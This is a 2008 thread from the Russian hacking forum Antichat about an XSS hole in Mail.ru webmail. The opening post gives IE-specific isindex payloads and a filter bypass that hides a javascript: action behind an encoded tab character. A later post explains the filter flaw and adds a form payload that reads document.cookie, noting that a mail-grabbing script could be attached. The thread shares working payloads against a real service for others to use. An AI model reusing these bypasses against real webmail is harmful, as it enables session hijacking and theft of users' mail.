Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активная XSS Mail.ru (IE6) / 09.11.08 (https://forum.antichat.xyz/showthread.php?t=91128)

brain[pillow] 10.11.2008 00:04
Активная XSS Mail.ru (IE6) / 09.11.08
 
Недавно рылся по секьюрити блогам, и нашёл вот такой вот интересный пост с двумя XSS-конструкциями для браузера IE (http://www.thespanner.co.uk/2008/08/26/new-xss-vector/):
Код:
1) <isindex type=image src=1 onerror=alert(1)>

2) <isindex action=javascript:alert(1) type=image>
Первая конструкция работает под все версии IE, но на mail.ru тщательно фильтруется активное содержимое любых тегов, поэтому вариант с onload/onerror я отбросил исходя из прошлого горького опыта.

А вот вторая XSS выглядела немного более многообещающей. Заюзав её в неизменном виде на почте mail.ru я получил вот что:
Код:
<isindex action=xjavascript:alert(1) type=image>
Через 5 минут этот фильтр обошёлся добавлением загнанной в hex табуляции (&#9). Фильтр сделал с этим вариантом следующее:
Код:
<isindex action=&#x9javascript:alert(1) type=image>
А это дело корректно обрабатывается в ослике, поэтому на данный момент мы имеем активную XSS в теле письма для IE 6.0:

Код:
<isindex action=&#9javascript:alert(1) type=image>
Пасиба за внимание, надеюсь, кому-нибудь пригодится :)

AdReNa1!Ne 10.11.2008 00:16
Ну что ж, молодец) Будем знать)

9()K_t()R 10.11.2008 00:28
+1

cremator (c) 10.11.2008 00:41
Еще и на рамблер есть

Kaimi 10.11.2008 00:45
У меня только как пассивка срабатывает

NFM 10.11.2008 00:53
в ие7 картинка типа и при нажатие алерт срабатывает

$n@ke 10.11.2008 12:18
в 8 Бета - тоже самое что и у Kaimi
x3 что за нах..

slider 10.11.2008 12:25
Цитата:
Сообщение от AdReNa1!Ne
Ну что ж, молодец) Будем знать)
Кстать по секрету .. =AdReNa1!Ne работает в mail.ru ;)

iddqd 10.11.2008 12:28
разведчик=\

Chaak 10.11.2008 12:51
Цитата:
Сообщение от slider
Кстать по секрету .. =AdReNa1!Ne работает в mail.ru ;)
может ты его спутал с модератором ксакепа?

F1shka 10.11.2008 13:25
Цитата:
Сообщение от iddqd
разведчик=\
Скорее казачёк засланный)

LeverOne 14.11.2008 03:12
Цитата:
Сообщение от brain[pillow]
...
Фильтр сделал с этим вариантом следующее:
Код:
<isindex action=&#x9javascript:alert(1) type=image>
А это дело корректно обрабатывается в ослике, поэтому на данный момент мы имеем активную XSS в теле письма для IE 6.0
...
1. Имеем пассивную, как было уже всеми отмечено, потому как в action она никогда и нигде не будет активной. Активная в isindex возможна только в атрибуте src (и родственных), но на mail.ru она не сработает, поскольку против таких вариантов там двойная защита: параметр src должен отвечать строгим требованиям. Если не отвечает, он автоматически замещается на мейловскую картинку-пиксель.

Конечно, это не просто пассивная, а пассивная в теле сообщения. Иx преимущества в том, что они не блокируются как потенциальные xss-атаки NoScript`ом для FF, и к ним можно прикрутить javascript-граббер почты.

2. Фильтр перевел табуляцию из десятичной в шестнадцатеричную из-за ошибки в определении начала параметра при использовании dec без явного разделителя (;). Начало параметра ему нужно, чтобы вставить "x". А "x" он вставляет всегда там, где находит сочетание "script", даже если это "blablascript". Ты эту ошибку обнаружил, тебе респекты.

3. Далее. Эти так называемые "новые" xss здесь ни при чем. Они только все портят, делая пассивную рабочей только в IE. Обычный тег form расширяет область работоспособности и на FF, и на Opera.

Код:
<form action="&#9javascript:alert(document.cookie)" target="_self"><input type=image src=http://sittttteeee.ru></form>


Время: 20:51